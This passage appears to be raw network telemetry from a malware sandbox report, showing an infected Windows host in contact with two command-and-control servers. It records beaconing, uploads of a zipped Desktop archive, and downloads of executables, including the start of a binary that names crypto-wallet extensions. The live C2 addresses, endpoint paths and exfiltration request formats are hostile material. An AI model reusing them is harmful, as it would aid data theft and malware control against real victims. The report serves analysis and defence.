                                                                                                                                                                Content-Length: 4
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Data Raw: 20 3c 63 3e
                                                                                                                                                                Data Ascii: <c>


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                46192.168.2.549832185.81.68.148803408C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Dec 13, 2024 01:37:51.596510887 CET312OUTPOST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Host: 185.81.68.148
                                                                                                                                                                Content-Length: 156
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Data Raw: 72 3d 38 32 44 30 39 36 36 33 35 41 32 39 41 31 46 41 30 41 38 39 37 46 43 35 36 30 32 35 43 32 45 39 44 45 36 34 39 44 42 43 38 37 42 39 38 32 36 33 46 30 41 42 45 43 44 35 46 41 44 34 38 43 42 45 46 43 37 46 33 33 38 39 42 42 30 35 36 39 38 30 44 32 38 37 42 38 32 32 37 41 39 33 32 42 39 42 41 30 34 33 30 46 43 36 46 33 38 45 46 46 39 44 42 38 46 37 38 32 35 39 33 46 42 43 31 38 32 32 38 32 34 42 45 31 30 44 42 36 34 34 34 43 37 38 45 41 45 38 33 43 43 33 33 42
                                                                                                                                                                Data Ascii: r=82D096635A29A1FA0A897FC56025C2E9DE649DBC87B98263F0ABECD5FAD48CBEFC7F3389BB056980D287B8227A932B9BA0430FC6F38EFF9DB8F782593FBC1822824BE10DB6444C78EAE83CC33B
                                                                                                                                                                Dec 13, 2024 01:37:52.947635889 CET204INHTTP/1.1 200 OK
                                                                                                                                                                Date: Fri, 13 Dec 2024 08:37:52 GMT
                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                Content-Length: 7
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Data Raw: 20 3c 63 3e 3c 64 3e
                                                                                                                                                                Data Ascii: <c><d>


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                47192.168.2.549833185.81.68.147801028C:\Windows\explorer.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Dec 13, 2024 01:37:51.734390974 CET278OUTPOST /VzCAHn.php?1DC30FADAFF92643095942 HTTP/1.1
                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Content-type: text/html
                                                                                                                                                                Connection: close
                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                Content-Length: 4
                                                                                                                                                                Dec 13, 2024 01:37:51.854331970 CET6OUTData Raw: 48 5e 08 51
                                                                                                                                                                Data Ascii: H^Q
                                                                                                                                                                Dec 13, 2024 01:37:53.362261057 CET216INHTTP/1.1 200 OK
                                                                                                                                                                Date: Fri, 13 Dec 2024 08:37:52 GMT
                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                Connection: close
                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                48192.168.2.549839185.81.68.147803408C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Dec 13, 2024 01:37:53.455741882 CET137OUTGET /update.exe HTTP/1.1
                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                If-Modified-Since: Thu, 12 Dec 2024 05:53:20 GMT
                                                                                                                                                                If-None-Match: "4b400-6290c54e671ba"
                                                                                                                                                                Dec 13, 2024 01:37:54.789036036 CET219INHTTP/1.1 304 Not Modified
                                                                                                                                                                Date: Fri, 13 Dec 2024 08:37:54 GMT
                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                Last-Modified: Thu, 12 Dec 2024 05:53:20 GMT
                                                                                                                                                                ETag: "4b400-6290c54e671ba"
                                                                                                                                                                Accept-Ranges: bytes


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                49192.168.2.549840185.81.68.147801028C:\Windows\explorer.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Dec 13, 2024 01:37:53.593900919 CET278OUTPOST /VzCAHn.php?1DC30FADAFF92643095942 HTTP/1.1
                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Content-type: text/html
                                                                                                                                                                Connection: close
                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                Content-Length: 4
                                                                                                                                                                Dec 13, 2024 01:37:53.713783026 CET6OUTData Raw: 48 5e 08 51
                                                                                                                                                                Data Ascii: H^Q
                                                                                                                                                                Dec 13, 2024 01:37:55.316325903 CET216INHTTP/1.1 200 OK
                                                                                                                                                                Date: Fri, 13 Dec 2024 08:37:54 GMT
                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                Connection: close
                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                50192.168.2.549841185.81.68.148803408C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Dec 13, 2024 01:37:54.840452909 CET158OUTPOST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Host: 185.81.68.148
                                                                                                                                                                Content-Length: 4
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Data Raw: 73 74 3d 73
                                                                                                                                                                Data Ascii: st=s
                                                                                                                                                                Dec 13, 2024 01:37:56.162066936 CET205INHTTP/1.1 200 OK
                                                                                                                                                                Date: Fri, 13 Dec 2024 08:37:55 GMT
                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                Content-Length: 8
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Data Raw: 20 3c 63 3e 33 3c 64 3e
                                                                                                                                                                Data Ascii: <c>3<d>


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                51192.168.2.549847185.81.68.147801028C:\Windows\explorer.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Dec 13, 2024 01:37:55.547332048 CET278OUTPOST /VzCAHn.php?1DC30FADAFF92643095942 HTTP/1.1
                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Content-type: text/html
                                                                                                                                                                Connection: close
                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                Content-Length: 4
                                                                                                                                                                Dec 13, 2024 01:37:55.667208910 CET6OUTData Raw: 48 5e 08 51
                                                                                                                                                                Data Ascii: H^Q
                                                                                                                                                                Dec 13, 2024 01:37:56.985291958 CET216INHTTP/1.1 200 OK
                                                                                                                                                                Date: Fri, 13 Dec 2024 08:37:56 GMT
                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                Connection: close
                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                52192.168.2.549849185.81.68.147802164C:\Windows\System32\rundll32.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Dec 13, 2024 01:37:56.935749054 CET169OUTPOST /7vhfjke3/index.php?wal=1 HTTP/1.1
                                                                                                                                                                Content-Type: multipart/form-data; boundary=----NDYxOA==
                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                Content-Length: 4778
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Dec 13, 2024 01:37:56.935823917 CET140OUTData Raw: 2d 2d 2d 2d 2d 2d 4e 44 59 78 4f 41 3d 3d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 32 34 36 31 32 32 36 35 38 33 36
                                                                                                                                                                Data Ascii: ------NDYxOA==Content-Disposition: form-data; name="data"; filename="246122658369_Desktop.zip"Content-Type: application/octet-stream
                                                                                                                                                                Dec 13, 2024 01:37:56.935889006 CET8OUTData Raw: 50 4b 03 04 14 00 00 00
                                                                                                                                                                Data Ascii: PK
                                                                                                                                                                Dec 13, 2024 01:37:56.935919046 CET8OUTData Raw: 08 00 1c 52 44 57 19 a3
                                                                                                                                                                Data Ascii: RDW
                                                                                                                                                                Dec 13, 2024 01:37:56.935941935 CET8OUTData Raw: 19 73 86 02 00 00 02 04
                                                                                                                                                                Data Ascii: s
                                                                                                                                                                Dec 13, 2024 01:37:56.935966969 CET8OUTData Raw: 00 00 17 00 00 00 5f 46
                                                                                                                                                                Data Ascii: _F
                                                                                                                                                                Dec 13, 2024 01:37:56.935992956 CET8OUTData Raw: 69 6c 65 73 5f 5c 42 4a
                                                                                                                                                                Data Ascii: iles_\BJ
                                                                                                                                                                Dec 13, 2024 01:37:56.936017990 CET8OUTData Raw: 5a 46 50 50 57 41 50 54
                                                                                                                                                                Data Ascii: ZFPPWAPT
                                                                                                                                                                Dec 13, 2024 01:37:56.936038017 CET8OUTData Raw: 2e 64 6f 63 78 15 93 49
                                                                                                                                                                Data Ascii: .docxI
                                                                                                                                                                Dec 13, 2024 01:37:56.936065912 CET8OUTData Raw: 8e 40 21 08 44 f7 9d f4
                                                                                                                                                                Data Ascii: @!D
                                                                                                                                                                Dec 13, 2024 01:37:56.936084986 CET8OUTData Raw: a1 10 bf 38 82 f3 74 ff
                                                                                                                                                                Data Ascii: 8t
                                                                                                                                                                Dec 13, 2024 01:37:58.569766045 CET198INHTTP/1.1 200 OK
                                                                                                                                                                Date: Fri, 13 Dec 2024 08:37:57 GMT
                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                Content-Length: 1
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Data Raw: 20
                                                                                                                                                                Data Ascii:


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                53192.168.2.549856185.81.68.147801028C:\Windows\explorer.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Dec 13, 2024 01:37:57.278350115 CET278OUTPOST /VzCAHn.php?1DC30FADAFF92643095942 HTTP/1.1
                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Content-type: text/html
                                                                                                                                                                Connection: close
                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                Content-Length: 4
                                                                                                                                                                Dec 13, 2024 01:37:57.399631023 CET6OUTData Raw: 48 5e 08 51
                                                                                                                                                                Data Ascii: H^Q
                                                                                                                                                                Dec 13, 2024 01:37:58.868114948 CET216INHTTP/1.1 200 OK
                                                                                                                                                                Date: Fri, 13 Dec 2024 08:37:57 GMT
                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                Connection: close
                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                54192.168.2.549855185.81.68.147803408C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Dec 13, 2024 01:37:57.282783031 CET184OUTPOST /7vhfjke3/index.php HTTP/1.1
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                Content-Length: 32
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Data Raw: 64 31 3d 31 30 30 30 30 38 33 30 31 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                                                                                                                                Data Ascii: d1=10000830101&unit=246122658369
                                                                                                                                                                Dec 13, 2024 01:37:58.538021088 CET201INHTTP/1.1 200 OK
                                                                                                                                                                Date: Fri, 13 Dec 2024 08:37:57 GMT
                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                Content-Length: 4
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Data Raw: 20 3c 63 3e
                                                                                                                                                                Data Ascii: <c>


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                55192.168.2.549857185.81.68.148803408C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Dec 13, 2024 01:37:57.799662113 CET312OUTPOST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Host: 185.81.68.148
                                                                                                                                                                Content-Length: 156
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Data Raw: 72 3d 38 32 44 30 39 36 36 33 35 41 32 39 41 31 46 41 30 41 38 39 37 46 43 35 36 30 32 35 43 32 45 39 44 45 36 34 39 44 42 43 38 37 42 39 38 32 36 33 46 30 41 42 45 43 44 35 46 41 44 34 38 43 42 45 46 43 37 46 33 33 38 39 42 42 30 35 36 39 38 30 44 32 38 37 42 38 32 32 37 41 39 33 32 42 39 42 41 30 34 33 30 46 43 36 46 33 38 45 46 46 39 44 42 38 46 37 38 32 35 39 33 46 42 43 31 38 32 32 38 32 34 42 45 31 30 44 42 36 34 34 34 43 37 38 45 41 45 38 33 43 43 33 33 42
                                                                                                                                                                Data Ascii: r=82D096635A29A1FA0A897FC56025C2E9DE649DBC87B98263F0ABECD5FAD48CBEFC7F3389BB056980D287B8227A932B9BA0430FC6F38EFF9DB8F782593FBC1822824BE10DB6444C78EAE83CC33B
                                                                                                                                                                Dec 13, 2024 01:37:59.164083004 CET204INHTTP/1.1 200 OK
                                                                                                                                                                Date: Fri, 13 Dec 2024 08:37:58 GMT
                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                Content-Length: 7
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Data Raw: 20 3c 63 3e 3c 64 3e
                                                                                                                                                                Data Ascii: <c><d>


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                56192.168.2.549858185.81.68.147806664C:\Windows\System32\rundll32.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Dec 13, 2024 01:37:57.892007113 CET169OUTPOST /7vhfjke3/index.php?wal=1 HTTP/1.1
                                                                                                                                                                Content-Type: multipart/form-data; boundary=----NDYxOA==
                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                Content-Length: 4778
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Dec 13, 2024 01:37:57.892091990 CET140OUTData Raw: 2d 2d 2d 2d 2d 2d 4e 44 59 78 4f 41 3d 3d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 32 34 36 31 32 32 36 35 38 33 36
                                                                                                                                                                Data Ascii: ------NDYxOA==Content-Disposition: form-data; name="data"; filename="246122658369_Desktop.zip"Content-Type: application/octet-stream
                                                                                                                                                                Dec 13, 2024 01:37:57.892152071 CET8OUTData Raw: 50 4b 03 04 14 00 00 00
                                                                                                                                                                Data Ascii: PK
                                                                                                                                                                Dec 13, 2024 01:37:57.892184973 CET8OUTData Raw: 08 00 1c 52 44 57 19 a3
                                                                                                                                                                Data Ascii: RDW
                                                                                                                                                                Dec 13, 2024 01:37:57.892205954 CET8OUTData Raw: 19 73 86 02 00 00 02 04
                                                                                                                                                                Data Ascii: s
                                                                                                                                                                Dec 13, 2024 01:37:57.892225981 CET8OUTData Raw: 00 00 17 00 00 00 5f 46
                                                                                                                                                                Data Ascii: _F
                                                                                                                                                                Dec 13, 2024 01:37:57.892242908 CET8OUTData Raw: 69 6c 65 73 5f 5c 42 4a
                                                                                                                                                                Data Ascii: iles_\BJ
                                                                                                                                                                Dec 13, 2024 01:37:57.892272949 CET8OUTData Raw: 5a 46 50 50 57 41 50 54
                                                                                                                                                                Data Ascii: ZFPPWAPT
                                                                                                                                                                Dec 13, 2024 01:37:57.892307997 CET8OUTData Raw: 2e 64 6f 63 78 15 93 49
                                                                                                                                                                Data Ascii: .docxI
                                                                                                                                                                Dec 13, 2024 01:37:57.892307997 CET8OUTData Raw: 8e 40 21 08 44 f7 9d f4
                                                                                                                                                                Data Ascii: @!D
                                                                                                                                                                Dec 13, 2024 01:37:57.892339945 CET8OUTData Raw: a1 10 bf 38 82 f3 74 ff
                                                                                                                                                                Data Ascii: 8t
                                                                                                                                                                Dec 13, 2024 01:37:59.630598068 CET198INHTTP/1.1 200 OK
                                                                                                                                                                Date: Fri, 13 Dec 2024 08:37:58 GMT
                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                Content-Length: 1
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Data Raw: 20
                                                                                                                                                                Data Ascii:


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                57192.168.2.549859185.81.68.148802164C:\Windows\System32\rundll32.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Dec 13, 2024 01:37:58.704850912 CET172OUTPOST /8Fvu5jh4DbS/index.php?wal=1 HTTP/1.1
                                                                                                                                                                Content-Type: multipart/form-data; boundary=----NDYxOA==
                                                                                                                                                                Host: 185.81.68.148
                                                                                                                                                                Content-Length: 4778
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Dec 13, 2024 01:37:58.704927921 CET140OUTData Raw: 2d 2d 2d 2d 2d 2d 4e 44 59 78 4f 41 3d 3d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 32 34 36 31 32 32 36 35 38 33 36
                                                                                                                                                                Data Ascii: ------NDYxOA==Content-Disposition: form-data; name="data"; filename="246122658369_Desktop.zip"Content-Type: application/octet-stream
                                                                                                                                                                Dec 13, 2024 01:37:58.704972029 CET8OUTData Raw: 50 4b 03 04 14 00 00 00
                                                                                                                                                                Data Ascii: PK
                                                                                                                                                                Dec 13, 2024 01:37:58.704997063 CET8OUTData Raw: 08 00 1c 52 44 57 19 a3
                                                                                                                                                                Data Ascii: RDW
                                                                                                                                                                Dec 13, 2024 01:37:58.705027103 CET8OUTData Raw: 19 73 86 02 00 00 02 04
                                                                                                                                                                Data Ascii: s
                                                                                                                                                                Dec 13, 2024 01:37:58.705039024 CET8OUTData Raw: 00 00 17 00 00 00 5f 46
                                                                                                                                                                Data Ascii: _F
                                                                                                                                                                Dec 13, 2024 01:37:58.705065966 CET8OUTData Raw: 69 6c 65 73 5f 5c 42 4a
                                                                                                                                                                Data Ascii: iles_\BJ
                                                                                                                                                                Dec 13, 2024 01:37:58.705082893 CET8OUTData Raw: 5a 46 50 50 57 41 50 54
                                                                                                                                                                Data Ascii: ZFPPWAPT
                                                                                                                                                                Dec 13, 2024 01:37:58.705112934 CET8OUTData Raw: 2e 64 6f 63 78 15 93 49
                                                                                                                                                                Data Ascii: .docxI
                                                                                                                                                                Dec 13, 2024 01:37:58.705130100 CET8OUTData Raw: 8e 40 21 08 44 f7 9d f4
                                                                                                                                                                Data Ascii: @!D
                                                                                                                                                                Dec 13, 2024 01:37:58.705153942 CET8OUTData Raw: a1 10 bf 38 82 f3 74 ff
                                                                                                                                                                Data Ascii: 8t
                                                                                                                                                                Dec 13, 2024 01:38:00.232743025 CET198INHTTP/1.1 200 OK
                                                                                                                                                                Date: Fri, 13 Dec 2024 08:37:59 GMT
                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                Content-Length: 1
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Data Raw: 20
                                                                                                                                                                Data Ascii:


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                58192.168.2.549860185.81.68.147801028C:\Windows\explorer.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Dec 13, 2024 01:37:59.094075918 CET278OUTPOST /VzCAHn.php?1DC30FADAFF92643095942 HTTP/1.1
                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Content-type: text/html
                                                                                                                                                                Connection: close
                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                Content-Length: 4
                                                                                                                                                                Dec 13, 2024 01:37:59.214122057 CET6OUTData Raw: 48 5e 08 51
                                                                                                                                                                Data Ascii: H^Q
                                                                                                                                                                Dec 13, 2024 01:38:00.550354004 CET216INHTTP/1.1 200 OK
                                                                                                                                                                Date: Fri, 13 Dec 2024 08:37:59 GMT
                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                Connection: close
                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                59192.168.2.549866185.81.68.148806664C:\Windows\System32\rundll32.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Dec 13, 2024 01:37:59.756328106 CET172OUTPOST /8Fvu5jh4DbS/index.php?wal=1 HTTP/1.1
                                                                                                                                                                Content-Type: multipart/form-data; boundary=----NDYxOA==
                                                                                                                                                                Host: 185.81.68.148
                                                                                                                                                                Content-Length: 4778
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Dec 13, 2024 01:37:59.756423950 CET140OUTData Raw: 2d 2d 2d 2d 2d 2d 4e 44 59 78 4f 41 3d 3d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 32 34 36 31 32 32 36 35 38 33 36
                                                                                                                                                                Data Ascii: ------NDYxOA==Content-Disposition: form-data; name="data"; filename="246122658369_Desktop.zip"Content-Type: application/octet-stream
                                                                                                                                                                Dec 13, 2024 01:37:59.756469965 CET8OUTData Raw: 50 4b 03 04 14 00 00 00
                                                                                                                                                                Data Ascii: PK
                                                                                                                                                                Dec 13, 2024 01:37:59.756499052 CET8OUTData Raw: 08 00 1c 52 44 57 19 a3
                                                                                                                                                                Data Ascii: RDW
                                                                                                                                                                Dec 13, 2024 01:37:59.756517887 CET8OUTData Raw: 19 73 86 02 00 00 02 04
                                                                                                                                                                Data Ascii: s
                                                                                                                                                                Dec 13, 2024 01:37:59.756537914 CET8OUTData Raw: 00 00 17 00 00 00 5f 46
                                                                                                                                                                Data Ascii: _F
                                                                                                                                                                Dec 13, 2024 01:37:59.756556988 CET8OUTData Raw: 69 6c 65 73 5f 5c 42 4a
                                                                                                                                                                Data Ascii: iles_\BJ
                                                                                                                                                                Dec 13, 2024 01:37:59.756573915 CET8OUTData Raw: 5a 46 50 50 57 41 50 54
                                                                                                                                                                Data Ascii: ZFPPWAPT
                                                                                                                                                                Dec 13, 2024 01:37:59.756603003 CET8OUTData Raw: 2e 64 6f 63 78 15 93 49
                                                                                                                                                                Data Ascii: .docxI
                                                                                                                                                                Dec 13, 2024 01:37:59.756623030 CET8OUTData Raw: 8e 40 21 08 44 f7 9d f4
                                                                                                                                                                Data Ascii: @!D
                                                                                                                                                                Dec 13, 2024 01:37:59.756640911 CET8OUTData Raw: a1 10 bf 38 82 f3 74 ff
                                                                                                                                                                Data Ascii: 8t
                                                                                                                                                                Dec 13, 2024 01:38:01.281836033 CET198INHTTP/1.1 200 OK
                                                                                                                                                                Date: Fri, 13 Dec 2024 08:38:00 GMT
                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                Content-Length: 1
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Data Raw: 20
                                                                                                                                                                Data Ascii:


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                60192.168.2.549867185.81.68.147803408C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Dec 13, 2024 01:38:00.200416088 CET46OUTGET /ssg.exe HTTP/1.1
                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:38:01.525239944 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                Date: Fri, 13 Dec 2024 08:38:00 GMT
                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                Last-Modified: Thu, 12 Dec 2024 10:50:51 GMT
                                                                                                                                                                ETag: "4b200-629107cd804d2"
                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                Content-Length: 307712
                                                                                                                                                                Content-Type: application/x-msdownload
                                                                                                                                                                Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 dc 48 28 d2 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 e4 02 00 00 cc 01 00 00 00 00 00 8e 02 03 00 00 20 00 00 00 20 03 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 05 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 3c 02 03 00 4f 00 00 00 00 20 03 00 c6 c9 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 05 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                                                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELH(0 @ @<O H.text `.rsrc @@.reloc@BpH (wautofill5tYWRqaWVoamhhamJ8WW9yb2lXYWxsZXQKaWJuZWpkZmptbWtwY25scGVia2xtbmtvZW9paG9mZWN8VHJvbmxpbmsKamJkYW9jbmVpaWlubWpiamxnYWxoY2VsZ2Jlam1uaWR8TmlmdHlXYWxsZXQKbmtiaWhmYmVvZ2FlYW9laGxlZm5r
